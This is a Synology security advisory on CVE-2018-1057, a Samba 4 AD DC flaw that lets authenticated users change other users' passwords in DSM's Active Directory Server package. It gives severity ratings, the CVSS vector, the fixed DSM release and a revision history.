Synology-SA-18:08 Samba

Publish Time: 2018-03-14 16:54:07 UTC+8

Last Updated: 2018-03-27 16:03:27 UTC+8

Severity
Important
Status
Resolved

Abstract

CVE-2018-1057 allows remote authenticated users to change other users' passwords via a susceptible version of Synology DiskStation Manager (DSM) with Active Directory Server installed.

Synology rates the overall severity as Important according to CVSS v3.0 metrics. However, the vulnerable functionality is disabled by default and there is no user interface to activate this option. Synology decides to postpone the fix until the upcoming update within the next 90 days.

Affected Products

Product Severity Fixed Release Availability
Active Directory Server Important Upgrade DSM 6.1 to 6.1.6-15266.

Mitigation

If you need immediate assistance, please contact security@synology.com.

Detail

  • CVE-2018-1057
    • Severity: Important
    • CVSS3 Base Score: 7.5
    • CVSS3 Vector: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/RL:T
    • On a Samba 4 AD DC the LDAP server in all versions of Samba from 4.0.0 onwards incorrectly validates permissions to modify passwords over LDAP allowing authenticated users to change any other users' passwords, including administrative users and privileged service accounts (eg Domain Controllers).

Reference

Revision

Revision Date Description
1 2018-03-14 Initial public release.
2 2018-03-27 Update for Active Directory Server is now available in Affected Products.